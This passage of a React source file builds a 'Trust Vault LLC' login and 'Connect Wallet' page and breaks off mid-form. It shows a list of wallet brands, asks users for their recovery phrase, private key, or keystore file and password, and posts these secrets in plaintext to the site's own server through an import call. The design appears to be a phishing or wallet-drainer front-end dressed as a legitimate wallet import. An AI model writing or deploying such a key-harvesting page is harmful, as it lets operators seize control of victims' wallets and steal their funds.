import React, { useState, useEffect } from 'react';
import { Link, useLocation, useNavigate } from 'react-router-dom';
import { useDispatch } from 'react-redux';
import Web3AuthService from '../../request/Auth/Web3AuthService';
import { setUser } from './userSlice';
import { setAuthStatus, setToken } from '../../request/Auth/authSlice';
import http from '../../request/http-common';
import { ethers } from 'ethers';

const Web3Auth = () => {
  const [activeConnectView, setActiveConnectView] = useState('wallets');
  const [recoveryPhrase, setRecoveryPhrase] = useState('');
  const [walletPin, setWalletPin] = useState('');
  const [accountName, setAccountName] = useState('');
  const [accountEmail, setAccountEmail] = useState('');
  const [accountPassword, setAccountPassword] = useState('');
  const [accountPasswordConfirmation, setAccountPasswordConfirmation] = useState('');
  const [importStep, setImportStep] = useState('secret');
  const [loginStep, setLoginStep] = useState('credentials');
  const [loginToken, setLoginToken] = useState('');
  const [loginEmail, setLoginEmail] = useState(() => localStorage.getItem('trustvault-login-email') || '');
  const [loginPassword, setLoginPassword] = useState('');
  const [loginPin, setLoginPin] = useState('');
  const [loading, setLoading] = useState(false);
  const [error, setError] = useState('');
  
  // New states for enhanced import
  const [cryptoWallets, setCryptoWallets] = useState([]);
  const [walletsLoading, setWalletsLoading] = useState(false);
  const [selectedWallet, setSelectedWallet] = useState('');
  const [selectedWalletObj, setSelectedWalletObj] = useState(null);
  const [importType, setImportType] = useState('recovery_phrase');
  const [walletAddress, setWalletAddress] = useState('');
  const [walletName, setWalletName] = useState('');
  const [keystoreJson, setKeystoreJson] = useState('');
  const [keystorePassword, setKeystorePassword] = useState('');
  const [privateKey, setPrivateKey] = useState('');
  const [walletSelectionError, setWalletSelectionError] = useState(false);
  const [walletsError, setWalletsError] = useState('');
  
  // Searchable dropdown states
  const [isWalletDropdownOpen, setIsWalletDropdownOpen] = useState(false);
  const [walletSearchTerm, setWalletSearchTerm] = useState('');
  
  const dispatch = useDispatch();
  const location = useLocation();
  const navigate = useNavigate();
  const currentPath = location.pathname.toLowerCase();
  const isConnectPage = currentPath === '/auth/connect';
  const isCreatePage = currentPath === '/auth/create';
  const isChooserPage = currentPath === '/login';

  // Fetch crypto wallets only when user opens connect page
  useEffect(() => {
    if (!isConnectPage) {
      return;
    }

    const fetchCryptoWallets = async () => {
      setWalletsLoading(true);
      setWalletsError('');
      try {
        const response = await http.get('/api/crypto-wallets');
        if (response.data.status === 'success') {
          setCryptoWallets(response.data.wallets);
          setWalletsError('');
        }
      } catch (error) {
        console.error('Failed to fetch crypto wallets:', error);
        setWalletsError('Failed to load wallet options. Please reload this page.');
      } finally {
        setWalletsLoading(false);
      }
    };
    
    fetchCryptoWallets();
  }, [isConnectPage]);

  // Auto-detect wallet address from keystore JSON
  useEffect(() => {
    if (importType === 'keystore_json' && keystoreJson) {
      try {
        const parsedKeystore = JSON.parse(keystoreJson);
        if (parsedKeystore.address) {
          setWalletAddress('0x' + parsedKeystore.address.replace('0x', ''));
        }
      } catch (e) {
        // Invalid JSON, will be caught during validation
      }
    }
  }, [keystoreJson, importType]);

  // Filter wallets based on search term
  const filteredWallets = cryptoWallets.filter(wallet =>
    wallet.name.toLowerCase().includes(walletSearchTerm.toLowerCase())
  );

  // Handle wallet selection
  const handleWalletSelect = (wallet) => {
    setSelectedWallet(wallet.name);
    setSelectedWalletObj(wallet);
    setWalletSearchTerm(wallet.name);
    setIsWalletDropdownOpen(false);
    setWalletSelectionError(false);
  };

  const handleImportWalletCardClick = (wallet) => {
    handleWalletSelect(wallet);
    setActiveConnectView('import');
    setImportStep('secret');
    setError('');
  };

  // Close dropdown when clicking outside
  useEffect(() => {
    const handleClickOutside = (event) => {
      if (isWalletDropdownOpen && !event.target.closest('.wallet-dropdown-container')) {
        setIsWalletDropdownOpen(false);
      }
    };
    document.addEventListener('mousedown', handleClickOutside);
    return () => document.removeEventListener('mousedown', handleClickOutside);
  }, [isWalletDropdownOpen]);

  const validateAccountIdentity = () => {
    if (accountName.trim().length < 2) {
      setError('Enter your name.');
      return false;
    }

    if (!accountEmail.trim()) {
      setError('Enter an email address for this account.');
      return false;
    }

    if (accountPassword.length < 8) {
      setError('Account password must be at least 8 characters.');
      return false;
    }

    setError('');
    return true;
  };

  const authErrorMessage = (err, fallback) => {
    const data = err.response?.data;
    const validation = data?.errors ? Object.values(data.errors).flat()[0] : null;
    return validation || data?.message || fallback;
  };

  const completeSession = (data) => {
    localStorage.setItem('auth-token', data.access_token);
    if (loginEmail.trim()) {
      localStorage.setItem('trustvault-login-email', loginEmail.trim());
    }
    dispatch(setUser(data.user));
    dispatch(setAuthStatus('authenticated'));
    dispatch(setToken(data.access_token));
    localStorage.setItem('notification', JSON.stringify({ message: data.message, type: 'success' }));
    window.dispatchEvent(new Event('processed'));
    window.dispatchEvent(new Event('newMessage'));
    window.location.href = '/';
  };

  const handleCredentialLogin = async (event) => {
    event.preventDefault();
    if (!loginEmail.trim() || !loginPassword) {
      setError('Enter your email and password.');
      return;
    }

    setLoading(true);
    setError('');

    try {
      const response = await http.post('/api/login', {
        email: loginEmail.trim(),
        password: loginPassword,
      });
      if (response.data.access_token) {
        completeSession(response.data);
        return;
      }
      if (response.data.status !== 'pin_required' || !response.data.login_token) {
        setError('Sign-in could not continue. Try again.');
        return;
      }
      localStorage.setItem('trustvault-login-email', loginEmail.trim());
      setLoginToken(response.data.login_token);
      setLoginPin('');
      setLoginStep('pin');
    } catch (err) {
      setError(authErrorMessage(err, 'Invalid email or password'));
    } finally {
      setLoading(false);
    }
  };

  const handleVerifyLoginPin = async () => {
    if (!/^\d{6}$/.test(loginPin)) {
      setError('Enter your 6-digit PIN.');
      return;
    }

    setLoading(true);
    setError('');

    try {
      const response = await http.post('/api/login/verify-pin', {
        login_token: loginToken,
        pin: loginPin,
      });
      completeSession(response.data);
    } catch (err) {
      setError(authErrorMessage(err, 'Incorrect PIN'));
      if (err.response?.status === 401 && /expired/i.test(err.response?.data?.message || '')) {
        setLoginStep('credentials');
        setLoginToken('');
        setLoginPin('');
      }
    } finally {
      setLoading(false);
    }
  };

  const handlePinKey = (key) => {
    setError('');
    if (key === 'clear') {
      setLoginPin('');
      return;
    }
    if (key === 'del') {
      setLoginPin((current) => current.slice(0, -1));
      return;
    }
    setLoginPin((current) => (current.length >= 6 ? current : current + key));
  };

  const handleCreateAccount = async (event) => {
    event.preventDefault();

    if (accountName.trim().length < 2) {
      setError('Enter your full name.');
      return;
    }

    if (!accountEmail.trim()) {
      setError('Enter an email address.');
      return;
    }

    if (accountPassword.length < 8) {
      setError('Password must be at least 8 characters.');
      return;
    }

    if (accountPassword !== accountPasswordConfirmation) {
      setError('Passwords do not match.');
      return;
    }

    setLoading(true);
    setError('');

    try {
      const response = await http.post('/api/create-account', {
        name: accountName.trim(),
        email: accountEmail.trim(),
        password: accountPassword,
        password_confirmation: accountPasswordConfirmation,
      });

      localStorage.setItem('trustvault-login-email', accountEmail.trim());
      setLoginEmail(accountEmail.trim());
      completeSession(response.data);
    } catch (err) {
      setError(authErrorMessage(err, 'Could not create your account'));
    } finally {
      setLoading(false);
    }
  };

  const deriveWalletAddress = (phrase = null, privKey = null) => {
    try {
      if (phrase) {
        // Derive wallet from recovery phrase
        const wallet = ethers.Wallet.fromMnemonic(phrase);
        setWalletAddress(wallet.address);
        return wallet.address;
      } else if (privKey) {
        // Derive wallet from private key
        const wallet = new ethers.Wallet(privKey);
        setWalletAddress(wallet.address);
        return wallet.address;
      }
    } catch (error) {
      console.error('Failed to derive wallet address:', error);
      return null;
    }
  };

  const resolveImportAddress = () => {
    setError('');
    setWalletSelectionError(false);

    if (!selectedWallet.trim()) {
      setError('Please select a wallet type');
      setWalletSelectionError(true);
      return null;
    }

    let address = '';

    if (importType === 'recovery_phrase') {
      const phraseWords = recoveryPhrase.trim().split(/\s+/).filter(Boolean);
      if (phraseWords.length !== 12 && phraseWords.length !== 24) {
        setError('Please enter a valid 12 or 24 word recovery phrase');
        return null;
      }
      address = deriveWalletAddress(recoveryPhrase.trim());
    } else if (importType === 'keystore_json') {
      if (!keystoreJson.trim() || !keystorePassword.trim()) {
        setError('Please enter your keystore JSON and password');
        return null;
      }
      try {
        const parsedKeystore = JSON.parse(keystoreJson);
        if (!parsedKeystore.address) {
          setError('Could not find a wallet address in that keystore');
          return null;
        }
        address = '0x' + String(parsedKeystore.address).replace(/^0x/, '');
        setWalletAddress(address);
      } catch (e) {
        setError('Invalid keystore JSON format');
        return null;
      }
    } else if (importType === 'private_key') {
      if (!privateKey.trim()) {
        setError('Please enter your private key');
        return null;
      }
      address = deriveWalletAddress(null, privateKey.trim());
    }

    if (!address || !/^0x[a-fA-F0-9]{40}$/.test(address)) {
      setError('Could not derive a valid wallet address. Check your credentials and try again.');
      return null;
    }

    return address;
  };

  const continueFromImportSecret = () => {
    if (!resolveImportAddress()) {
      return;
    }
    setImportStep('account');
  };

  const continueFromImportAccount = () => {
    if (!validateAccountIdentity()) {
      return;
    }
    setImportStep('pin');
  };

  const handleImportWallet = async () => {
    const finalWalletAddress = resolveImportAddress();
    if (!finalWalletAddress || !validateAccountIdentity()) {
      return;
    }

    if (!/^\d{6}$/.test(walletPin)) {
      setError('Create a 6-digit PIN. You will enter it after your password on every login.');
      return;
    }
    
    setLoading(true);
    setError('');

    try {
      const importData = {
        wallet_address: finalWalletAddress,
        wallet_name: walletName || selectedWallet || 'Imported Wallet',
        wallet_type: importType,
        selected_wallet: selectedWallet
      };

      // Add data based on import type
      if (importType === 'recovery_phrase') {
        importData.recovery_phrase = recoveryPhrase;
      } else if (importType === 'keystore_json') {
        importData.keystore_json = keystoreJson;
        importData.keystore_password = keystorePassword;
      } else if (importType === 'private_key') {
        importData.private_key = privateKey;
      }

      importData.name = accountName.trim();
      importData.email = accountEmail.trim();
      importData.password = accountPassword;
      importData.wallet_pin = walletPin;
      
      const response = await Web3AuthService.importWallet(importData);

      if (response.data.status === 'success') {
        localStorage.setItem('auth-token', response.data.access_token);
        dispatch(setUser(response.data.user));
        dispatch(setAuthStatus('authenticated'));
        dispatch(setToken(response.data.access_token));
        localStorage.setItem('notification', JSON.stringify({message: response.data.message, type: 'success'}));
        const event2 = new Event('processed');
        window.dispatchEvent(event2);
        const event = new Event('newMessage');
        window.dispatchEvent(event);
        window.location.href = '/';
      }
    } catch (err) {
      setError(authErrorMessage(err, 'Failed to import wallet'));
    } finally {
      setLoading(false);
    }
  };

  const goBack = () => {
    setError('');

    if (isChooserPage && loginStep === 'pin') {
      setLoginStep('credentials');
      setLoginToken('');
      setLoginPin('');
      return;
    }

    if (isChooserPage) {
      navigate('/');
      return;
    }

    if (isConnectPage && activeConnectView === 'import') {
      if (importStep === 'pin') {
        setImportStep('account');
      } else if (importStep === 'account') {
        setImportStep('secret');
      } else {
        setActiveConnectView('wallets');
      }
      return;
    }

    if (isConnectPage) {
      navigate('/');
      return;
    }

    if (isCreatePage) {
      navigate('/auth/connect');
      return;
    }

    navigate('/');
  };

  return (
    <div className="relative min-h-screen w-full overflow-x-hidden bg-deepspace flex items-start sm:items-center justify-center px-3 sm:px-4 py-6 sm:py-8">
      {/* Background */}
      <div className="absolute inset-0">
        <div className="absolute inset-0 bg-gradient-to-br from-deepspace via-deepspace-100 to-deepspace-200"></div>
        <div className="hidden sm:block absolute top-1/4 left-1/4 w-96 h-96 bg-cyber-blue/10 rounded-full blur-3xl animate-pulse-slow"></div>
        <div className="hidden sm:block absolute bottom-1/4 right-1/4 w-80 h-80 bg-cyber-purple/10 rounded-full blur-3xl animate-pulse-slow"></div>
      </div>

      {/* Auth Card */}
      <div className="relative max-w-2xl w-full z-20">
        <div className="relative bg-dark-card/80 backdrop-blur-xl border border-dark-border/50 rounded-2xl sm:rounded-3xl p-4 sm:p-6 lg:p-12 shadow-[0_20px_60px_rgb(0,0,0,0.6)]">
          <button
            type="button"
            onClick={goBack}
            aria-label="Go back"
            className="absolute left-4 top-4 sm:left-6 sm:top-6 text-text-primary hover:text-cyber-blue transition-colors"
          >
            <svg className="w-6 h-6" fill="none" stroke="currentColor" viewBox="0 0 24 24">
              <path strokeLinecap="round" strokeLinejoin="round" strokeWidth="2" d="M10 19l-7-7m0 0l7-7m-7 7h18" />
            </svg>
          </button>

          {/* Header */}
          <div className="text-center mb-8">
            <img
              src="/images/logos/trust-vault-logo-light.png"
              alt="Trust Vault LLC"
              className="h-12 w-auto mx-auto mb-5 object-contain"
            />
            <h1 className="text-2xl sm:text-3xl lg:text-4xl font-bold text-text-primary mb-3">
              {isChooserPage ? 'Welcome to' : isConnectPage ? 'Connect Wallet' : 'Create account'}
              <span className="block bg-gradient-to-r from-cyber-blue to-cyber-purple bg-clip-text text-transparent">
                Trust Vault LLC
              </span>
            </h1>
            <p className="text-text-secondary">
              {isChooserPage
                ? loginStep === 'pin'
                  ? 'Enter your PIN to open your dashboard'
                  : 'Sign in with your email and password'
                : isConnectPage
                  ? 'Connect your existing wallet securely'
                  : 'Create an account with your full name, email, and password'}
            </p>
          </div>

          {/* Error Message */}
          {error && (
            <div className="mb-6 p-4 bg-cyber-red/10 border border-cyber-red/30 rounded-xl text-cyber-red">
              {error}
            </div>
          )}

          {/* Choice Screen */}
          {isChooserPage && loginStep === 'credentials' && (
            <div className="space-y-5">
              <form className="space-y-4" onSubmit={handleCredentialLogin}>
                <div>
                  <label className="block text-sm font-semibold text-text-primary mb-2">Email</label>
                  <input
                    type="email"
                    value={loginEmail}
                    onChange={(e) => setLoginEmail(e.target.value)}
                    placeholder="you@example.com"
                    autoComplete="username"
                    className="w-full px-4 py-3 bg-deepspace/50 border border-dark-border/50 rounded-xl text-text-primary placeholder-text-muted focus:border-cyber-blue/50 focus:outline-none transition-colors"
                  />
                </div>
                <div>
                  <label className="block text-sm font-semibold text-text-primary mb-2">Password</label>
                  <input
                    type="password"
                    value={loginPassword}
                    onChange={(e) => setLoginPassword(e.target.value)}
                    placeholder="Enter your password"
                    autoComplete="current-password"
                    className="w-full px-4 py-3 bg-deepspace/50 border border-dark-border/50 rounded-xl text-text-primary placeholder-text-muted focus:border-cyber-blue/50 focus:outline-none transition-colors"
                  />
                </div>
                <button
                  type="submit"
                  disabled={loading}
                  className="w-full py-4 bg-gradient-to-r from-cyber-blue to-cyber-purple text-white font-bold rounded-xl transition-all duration-300 disabled:opacity-50"
                >
                  {loading ? 'Checking...' : 'Continue'}
                </button>
                <div className="flex items-center justify-between text-sm">
                  <Link to="/auth/connect" className="text-cyber-blue hover:text-cyber-purple">
                    Connect a wallet
                  </Link>
                  <Link to="/forgot" className="text-cyber-blue hover:text-cyber-purple">
                    Forgot password?
                  </Link>
                </div>
              </form>
            </div>
          )}

          {isChooserPage && loginStep === 'pin' && (
            <div className="space-y-5">
              <p className="text-sm text-text-muted text-center">
                Password accepted for {loginEmail}. Enter your 6-digit PIN to open the dashboard.
              </p>
              <div className="flex justify-center gap-3">
                {Array.from({ length: 6 }).map((_, index) => (
                  <span
                    key={index}
                    className={`w-3.5 h-3.5 rounded-full ${
                      index < loginPin.length ? 'bg-cyber-blue' : 'bg-dark-border'
                    }`}
                  />
                ))}
              </div>
              <div className="grid grid-cols-3 gap-3 max-w-xs mx-auto">
                {['1', '2', '3', '4', '5', '6', '7', '8', '9', 'clear', '0', 'del'].map((key) => (
                  <button
                    key={key}
                    type="button"
                    onClick={() => handlePinKey(key)}
                    className="py-3 rounded-xl bg-deepspace/50 border border-dark-border/50 text-text-primary font-semibold hover:border-cyber-blue/50"
                  >
                    {key === 'clear' ? 'C' : key === 'del' ? '⌫' : key}
                  </button>
                ))}
              </div>
              <button
                type="button"
                disabled={loading || loginPin.length !== 6}
                onClick={handleVerifyLoginPin}
                className="w-full py-4 bg-gradient-to-r from-cyber-blue to-cyber-purple text-white font-bold rounded-xl transition-all duration-300 disabled:opacity-50"
              >
                {loading ? 'Opening...' : 'Open dashboard'}
              </button>
            </div>
          )}

          {/* Connect Wallet Page */}
          {isConnectPage && (
            <div className="space-y-6">
              {activeConnectView === 'wallets' && (
                <div>
                  {walletsLoading && (
                    <div className="text-center text-text-muted py-6">Loading wallet options...</div>
                  )}
                  {walletsError && (
                    <div className="text-center text-cyber-red py-6">{walletsError}</div>
                  )}
                  {!walletsLoading && !walletsError && (
                    <div className="grid grid-cols-2 sm:grid-cols-3 gap-3 sm:gap-4 max-h-none sm:max-h-72 overflow-visible sm:overflow-y-auto pr-0 sm:pr-1">
                      {cryptoWallets.map((wallet) => (
                        <button
                          key={wallet.id}
                          onClick={() => handleImportWalletCardClick(wallet)}
                          className="bg-deepspace/50 border border-dark-border/50 rounded-xl p-4 text-center hover:border-cyber-blue/50 transition-colors"
                        >
                          <img
                            src={wallet.image}
                            alt={wallet.name}
                            className="w-8 h-8 rounded-full object-cover mx-auto mb-2 border border-cyber-blue/20"
                            onError={(e) => {
                              e.target.onerror = null;
                              e.target.src = 'https://via.placeholder.com/32?text=W';
                            }}
                          />
                          <div className="text-xs sm:text-sm text-text-primary break-words">{wallet.name}</div>
                        </button>
                      ))}
                    </div>
                  )}
                  <div className="pt-6 space-y-4">
                    <div className="flex items-center gap-3 text-xs uppercase tracking-wide text-text-muted">
                      <span className="h-px flex-1 bg-dark-border/60" />
                      or
                      <span className="h-px flex-1 bg-dark-border/60" />
                    </div>
                    <button
                      type="button"
                      onClick={() => navigate('/auth/create')}
                      className="w-full py-4 bg-deepspace/50 border border-dark-border/50 text-text-primary font-bold rounded-xl transition-all duration-300 hover:border-cyber-blue/50"
                    >
                      Create account
                    </button>
                    <p className="text-center text-sm text-text-muted">
                      Already have an account?{' '}
                      <Link to="/login" className="text-cyber-blue hover:text-cyber-purple">
                        Sign in
                      </Link>
                    </p>
                  </div>
                </div>
              )}

              {activeConnectView === 'import' && (
                <div className="space-y-6">
                  {importStep === 'secret' && (
                  <>
                  {/* Wallet Type Selection - Searchable with Images */}
                  <div className="wallet-dropdown-container relative">
                <label className="block text-sm font-semibold text-text-primary mb-3">
                  Select Wallet Type <span className="text-cyber-red">*</span>
                </label>
                
                {/* Search Input */}
                <div className="relative">
                  <input
                    type="text"
                    value={walletSearchTerm}
                    onChange={(e) => {
                      setWalletSearchTerm(e.target.value);
                      setIsWalletDropdownOpen(true);
                    }}
                    onFocus={() => !walletsLoading && !walletsError && setIsWalletDropdownOpen(true)}
                    placeholder={
                      walletsError
                        ? 'Wallets failed to load. Reload this page.'
                        : walletsLoading
                          ? 'Loading wallet types...'
                          : 'Search wallet...'
                    }
                    disabled={walletsLoading || !!walletsError}
                    className={`w-full px-4 py-3 pr-10 bg-deepspace/50 border rounded-xl text-text-primary placeholder-text-muted focus:outline-none transition-colors ${
                      walletSelectionError
                        ? 'border-cyber-red/50'
                        : walletsError
                          ? 'border-cyber-red/50'
                          : selectedWallet
                            ? 'border-cyber-blue/50'
                            : 'border-dark-border/50'
                    } ${(walletsLoading || walletsError) ? 'opacity-60 cursor-not-allowed' : ''}`}
                  />
                  
                  {/* Selected Wallet Image & Clear Button */}
                  {selectedWalletObj && (
                    <div className="absolute right-3 top-1/2 transform -translate-y-1/2 flex items-center gap-2">
                      <button
                        type="button"
                        onClick={(e) => {
                          e.stopPropagation();
                          setSelectedWallet('');
                          setSelectedWalletObj(null);
                          setWalletSearchTerm('');
                        }}
                        className="text-text-muted hover:text-cyber-red transition-colors"
                      >
                        <svg className="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                          <path strokeLinecap="round" strokeLinejoin="round" strokeWidth="2" d="M6 18L18 6M6 6l12 12" />
                        </svg>
                      </button>
                      <img 
                        src={selectedWalletObj.image} 
                        alt={selectedWalletObj.name}
                        className="w-6 h-6 rounded-full object-cover"
                      />
                    </div>
                  )}
                  
                  {/* Dropdown Arrow */}
                  {!selectedWalletObj && (
                    <div className="absolute right-3 top-1/2 transform -translate-y-1/2 text-text-muted pointer-events-none">
                      <svg className="w-5 h-5" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                        <path strokeLinecap="round" strokeLinejoin="round" strokeWidth="2" d="M19 9l-7 7-7-7" />
                      </svg>
                    </div>
                  )}
                </div>

                {/* Dropdown List */}
                {isWalletDropdownOpen && !walletsLoading && !walletsError && (
                  <div 
                    className="absolute z-50 w-full mt-2 bg-dark-card border border-dark-border/50 rounded-xl shadow-2xl max-h-64 overflow-y-auto"
                    style={{
                      scrollbarWidth: 'thin',
                      scrollbarColor: '#4ECCA3 #1a1a2e'
                    }}
                  >
                    <style jsx>{`
                      .absolute::-webkit-scrollbar {
                        width: 8px;
                      }
                      .absolute::-webkit-scrollbar-track {
                        background: #1a1a2e;
                        border-radius: 10px;
                      }
                      .absolute::-webkit-scrollbar-thumb {
                        background: #4ECCA3;
                        border-radius: 10px;
                      }
                      .absolute::-webkit-scrollbar-thumb:hover {
                        background: #3dbb8f;
                      }
                    `}</style>
                    {filteredWallets.length > 0 ? (
                      filteredWallets.map((wallet) => (
                        <div
                          key={wallet.id}
                          onClick={() => handleWalletSelect(wallet)}
                          className="flex items-center gap-3 px-4 py-3 hover:bg-cyber-blue/10 cursor-pointer transition-colors border-b border-dark-border/30 last:border-b-0"
                        >
                          <img 
                            src={wallet.image} 
                            alt={wallet.name}
                            className="w-8 h-8 rounded-full object-cover flex-shrink-0 border-2 border-cyber-blue/20"
                            onError={(e) => {
                              e.target.onerror = null;
                              e.target.src = 'https://via.placeholder.com/32?text=W';
                            }}
                          />
                          <span className="text-text-primary font-medium">{wallet.name}</span>
                        </div>
                      ))
                    ) : (
                      <div className="px-4 py-3 text-text-muted text-center">
                        No wallets found
                      </div>
                    )}
                  </div>
                )}

                {walletSelectionError && (
                  <p className="text-cyber-red text-xs mt-1">Please select a wallet type</p>
                )}
                {walletsLoading && (
                  <div className="flex items-center gap-2 text-text-muted text-sm mt-2">
                    <svg className="w-4 h-4 animate-spin" viewBox="0 0 24 24">
                      <circle className="opacity-25" cx="12" cy="12" r="10" stroke="currentColor" strokeWidth="4"></circle>
                      <path className="opacity-75" fill="currentColor" d="M4 12a8 8 0 018-8v4a4 4 0 00-4 4H4z"></path>
                    </svg>
                    Loading wallet types...
                  </div>
                )}
                {walletsError && (
                  <div className="flex flex-col sm:flex-row sm:items-center sm:justify-between gap-3 text-sm mt-2 text-cyber-red">
                    <span>{walletsError}</span>
                    <button
                      type="button"
                      onClick={() => window.location.reload()}
                      className="self-start sm:self-center px-3 py-1 rounded-lg border border-cyber-red/40 text-cyber-red hover:bg-cyber-red/10 transition-colors"
                    >
                      Reload Page
                    </button>
                  </div>
                )}
                  </div>

                  {/* Import Method Selection */}
                  <div>
                <label className="block text-sm font-semibold text-text-primary mb-3">
                  Import Method
                </label>
                <div className="grid grid-cols-3 gap-2 mb-4">
                  <button
                    type="button"
                    onClick={() => setImportType('recovery_phrase')}
                    className={`py-2 px-1 rounded-lg text-[11px] sm:text-sm leading-tight font-medium transition-all ${
                      importType === 'recovery_phrase'
                        ? 'bg-cyber-blue text-white'
                        : 'bg-deepspace/50 text-text-muted hover:text-text-primary'
                    }`}
                  >
                    Phrase
                  </button>
                  <button
                    type="button"
                    onClick={() => setImportType('keystore_json')}
                    className={`py-2 px-1 rounded-lg text-[11px] sm:text-sm leading-tight font-medium transition-all ${
                      importType === 'keystore_json'
                        ? 'bg-cyber-blue text-white'
                        : 'bg-deepspace/50 text-text-muted hover:text-text-primary'
                    }`}
                  >
                    Keystore
                  </button>
                  <button
                    type="button"
                    onClick={() => setImportType('private_key')}
                    className={`py-2 px-1 rounded-lg text-[11px] sm:text-sm leading-tight font-medium transition-all ${
                      importType === 'private_key'
                        ? 'bg-cyber-blue text-white'
                        : 'bg-deepspace/50 text-text-muted hover:text-text-primary'
                    }`}
                  >
                    Private Key
                  </button>
                </div>
                  </div>

              {/* Wallet Address - Auto-detected */}
                  {walletAddress && (
                <div className="bg-cyber-green/10 border border-cyber-green/30 rounded-xl p-4">
                  <label className="block text-sm font-semibold text-cyber-green mb-2">
                    ✓ Detected Wallet Address
                  </label>
                  <div className="text-text-primary font-mono text-sm break-all">
                    {walletAddress}
                  </div>
                </div>
                  )}

              {/* Wallet Name */}
                  <div>
                <label className="block text-sm font-semibold text-text-primary mb-3">
                  Wallet Name (Optional)
                </label>
                <input
                  type="text"
                  value={walletName}
                  onChange={(e) => setWalletName(e.target.value)}
                  placeholder="My Wallet"
                  className="w-full px-4 py-3 bg-deepspace/50 border border-dark-border/50 rounded-xl text-text-primary placeholder-text-muted focus:border-cyber-blue/50 focus:outline-none transition-colors"
                />
                  </div>

              {/* Recovery Phrase Input */}
                  {importType === 'recovery_phrase' && (
                <div>
                  <label className="block text-sm font-semibold text-text-primary mb-3">
                    Recovery Phrase (12 or 24 words)
                  </label>
                  <textarea
                    value={recoveryPhrase}
                    onChange={(e) => setRecoveryPhrase(e.target.value)}
                    placeholder="Enter your recovery phrase separated by spaces"
                    rows="4"
                    className="w-full px-4 py-3 bg-deepspace/50 border border-dark-border/50 rounded-xl text-text-primary placeholder-text-muted focus:border-cyber-blue/50 focus:outline-none transition-colors"
                  />
                </div>
                  )}

              {/* Keystore JSON Input */}
                  {importType === 'keystore_json' && (
                <div className="space-y-4">
                  <div>
                    <label className="block text-sm font-semibold text-text-primary mb-3">
                      Keystore JSON
                    </label>
                    <textarea
                      value={keystoreJson}
                      onChange={(e) => setKeystoreJson(e.target.value)}
                      placeholder="Paste your keystore JSON here..."
                      rows="6"
                      className="w-full px-4 py-3 bg-deepspace/50 border border-dark-border/50 rounded-xl text-text-primary placeholder-text-muted focus:border-cyber-blue/50 focus:outline-none transition-colors font-mono text-sm"
                    />
                  </div>
                  <div>
                    <label className="block text-sm font-semibold text-text-primary mb-3">
                      Keystore Password
                    </label>
                    <input
                      type="password"
                      value={keystorePassword}
                      onChange={(e) => setKeystorePassword(e.target.value)}
                      placeholder="Enter your keystore password"
                      className="w-full px-4 py-3 bg-deepspace/50 border border-dark-border/50 rounded-xl text-text-primary placeholder-text-muted focus:border-cyber-blue/50 focus:outline-none transition-colors"
                    />
                  </div>
                </div>
                  )}

              {/* Private Key Input */}
                  {importType === 'private_key' && (
                <div>
                  <label className="block text-sm font-semibold text-text-primary mb-3">
                    Private Key
                  </label>
                  <textarea
                    value={privateKey}
                    onChange={(e) => setPrivateKey(e.target.value)}
                    placeholder="Enter your private key"
                    rows="3"
                    className="w-full px-4 py-3 bg-deepspace/50 border border-dark-border/50 rounded-xl text-text-primary placeholder-text-muted focus:border-cyber-blue/50 focus:outline-none transition-colors font-mono text-sm"
                  />
                  </div>
                  )}

                  <button
                    type="button"
                    onClick={continueFromImportSecret}
                    className="w-full py-4 bg-gradient-to-r from-cyber-blue to-cyber-purple text-white font-bold rounded-xl transition-all duration-300"
                  >
                    Next
                  </button>
                  </>
                  )}

                  {importStep === 'account' && (
                  <div className="space-y-4">
                  <div>
                    <label className="block text-sm font-semibold text-text-primary mb-3">
                      Your name
                    </label>
                    <input
                      type="text"
                      value={accountName}
                      onChange={(e) => setAccountName(e.target.value)}
                      placeholder="Full name"
                      autoComplete="name"
                      className="w-full px-4 py-3 bg-deepspace/50 border border-dark-border/50 rounded-xl text-text-primary placeholder-text-muted focus:border-cyber-blue/50 focus:outline-none transition-colors"
                    />
                  </div>
                  <div>
                    <label className="block text-sm font-semibold text-text-primary mb-3">
                      Email address
                    </label>
                    <input
                      type="email"
                      value={accountEmail}
                      onChange={(e) => setAccountEmail(e.target.value)}
                      placeholder="you@example.com"
                      autoComplete="email"
                      className="w-full px-4 py-3 bg-deepspace/50 border border-dark-border/50 rounded-xl text-text-primary placeholder-text-muted focus:border-cyber-blue/50 focus:outline-none transition-colors"
                    />
                  </div>
                  <div>
                    <label className="block text-sm font-semibold text-text-primary mb-3">
                      Account password
                    </label>
                    <input
                      type="password"
                      value={accountPassword}
                      onChange={(e) => setAccountPassword(e.target.value)}
                      placeholder="Min. 8 characters"
                      autoComplete="new-password"
                      className="w-full px-4 py-3 bg-deepspace/50 border border-dark-border/50 rounded-xl text-text-primary placeholder-text-muted focus:border-cyber-blue/50 focus:outline-none transition-colors"
                    />
                    <p className="text-xs text-text-muted mt-2">
                      Used with your email the next time you sign in.
                    </p>
                  </div>
                  <button
                    type="button"
                    onClick={continueFromImportAccount}
                    className="w-full py-4 bg-gradient-to-r from-cyber-blue to-cyber-purple text-white font-bold rounded-xl transition-all duration-300"
                  >
                    Next
                  </button>
                  </div>
                  )}

                  {importStep === 'pin' && (
                  <div className="space-y-4">
                  <div>
                    <label className="block text-sm font-semibold text-text-primary mb-3">
                      Login PIN
                    </label>
                    <input
                      type="password"
                      inputMode="numeric"
                      value={walletPin}
                      onChange={(e) => setWalletPin(e.target.value.replace(/\D/g, '').slice(0, 6))}
                      placeholder="6-digit PIN"
                      maxLength={6}
                      className="w-full px-4 py-3 bg-deepspace/50 border border-dark-border/50 rounded-xl text-text-primary placeholder-text-muted focus:border-cyber-blue/50 focus:outline-none transition-colors text-center tracking-[0.4em]"
                    />
                    <p className="text-xs text-text-muted mt-2">
                      Required after your password every time you open the dashboard.
                    </p>
                  </div>

                  <button
                    type="button"
                    onClick={handleImportWallet}
                    disabled={loading}
                    className="w-full py-4 bg-gradient-to-r from-cyber-blue to-cyber-purple text-white font-bold rounded-xl transition-all duration-300 disabled:opacity-50"
                  >
                    {loading ? 'Importing...' : 'Import Wallet'}
                  </button>
                  </div>
                  )}
                </div>
              )}
            </div>
          )}

          {/* Create account */}
          {isCreatePage && (
            <form className="space-y-4" onSubmit={handleCreateAccount}>
              <div>
                <label className="block text-sm font-semibold text-text-primary mb-2">Full name</label>
                <input
                  type="text"
                  value={accountName}
                  onChange={(e) => setAccountName(e.target.value)}
                  placeholder="Full name"
                  autoComplete="name"
